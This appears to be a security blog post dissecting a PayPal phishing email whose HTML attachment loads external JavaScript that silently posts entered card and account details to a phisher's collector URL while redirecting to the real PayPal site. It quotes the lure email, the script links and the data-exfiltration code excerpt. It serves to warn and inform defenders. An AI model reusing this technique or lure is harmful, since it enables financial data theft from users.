I received, what at first glance looked like a “normal” PayPal phishing email. It looked a typical email from a clueless phisher, using one of the phishing kits, with a standard email with a HTML form attachment. OK nothing weird or different, except all the obvious links in the HTML go to genuine PayPal sites.

The phishers are using a hidden JavaScript redirect method to steal the data, while the submit button still shows as going to PayPal.com. This is extremely dangerous and very difficult for an average user to defend against and know that they are passing information to a criminal.

We always tell users to hover the mouse over a link or submit button and make sure that the link is to the correct “safe” location. This no longer is safe advice when hidden JavaScript redirection is used. The only saving grace with this particular phishing attack is that the phishing page is a HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in html form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.

The email looks like
From: PayPal <[email protected]>
Date: Sun 12/06/2021 18:10
Subject:Review your PayPal account limited statement
Attachment: Issue ID Number PP 8400-7911-20-00.html

Body Content:

Review your PayPal account limited statement
Dear PayPal Customer,

We understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.

As part of our security measures, we regularly check the PayPal screen activity. We request information from you for the following reason:

Our system detected unusual charges to a credit card linked to your PayPal account.

Download the attached form to verify your Profile information and restore your account access. And make sure you enter the information accurately, and according to the formats required. Fill in all the required fields.

Thanks for joining the millions of people who rely on us to make secure financial transactions around the world.


Review your PayPal account limited statement
That all looks typical so far, so lets look at the attachment in a browser and see where the submit button takes us, so we can report it. Ah, says me, scratching my head, The submit button goes to the genuine PayPal Site, albeit the Israeli version.

<form class=”safeSubmit multiplesubmitform” method=”post” id=”signup_form” name=”signup_form” action=”″><fieldset class=”error”><legend class=”accessAid”>SignUp Form</legend>

So think, the phishers cannot be that clueless that they have taken a genuine PayPal email and forgotten to change the submit link can they? So look deeper and see the CSS & JS files at the top of the html code page that definitely do not belong to PayPal.

<link rel=”stylesheet” href=”http://www.egypt-trips.co/wp-admin/includes/New/css/default.css” />
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/jquery.ba-hashchange.min.js“></script>
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/default.js“></script>
Ah, bells ring & gears click into place, says me. ” I can see what they are doing”. The javascript runs as soon as the page ( HTML attachment) is loaded and intercepts all posts to PayPal.com and diverts them to the actual phishing page to accept all your details, while your browser still goes to the genuine PayPal page, if you are unwise enough to fall for this trick.

The important sections from the default.js file that actually performs the hidden/silent phishing redirect are these that make the submit button actually go to PayPal.com while silently sending the entered data to the phishers website at the same time. This fools the majority of anti-phishing techniques and protections, including most toolbars, phishing filters and Anti-viruses, who currently, only look at the url for the submit button and don’t examine the linked JavaScript files.

data_receiver_url = ‘http://www.egypt-trips.co/wp-admin/includes/New/post_data.php’,
redirect_url = ‘https://www.paypal.com/’;
//setup page layout based on hashes
var hash = location.hash;
var current_page = hash || ‘#signup’;
//$(‘div[data-page!=signup]’).css(‘background-color’, ‘red’);
< snip>
submitHandler: function(form, validator) {
cc_data = $(form).serialize();
$(‘#target’).attr(‘src’, data_receiver_url+’?’+cus_data+’&’+cc_data);
document.location.href = redirect_url;

This is the HTML page as seen using Firefox with no script, so javascript won’t run and you can see what information they want
paypal phish seen in firefox with no script 1
The same page seen in Internet explorer
paypal phish seen in internet explorer
Just in case the phishing site gets taken down quickly, I have attached the html page & the js files that were downloaded from www.egypt-trips.co in a zip for researchers to investigate further ( usual password) HERE
Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of Phishing attacks yesterday, we would be in trouble, because users wouldn’t realise that they were giving their details to a phisher.

Luckily enough, there are enough warning bells with this particular one to prevent most people falling for it, but some always do.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or click the link in the email . Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details.

Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.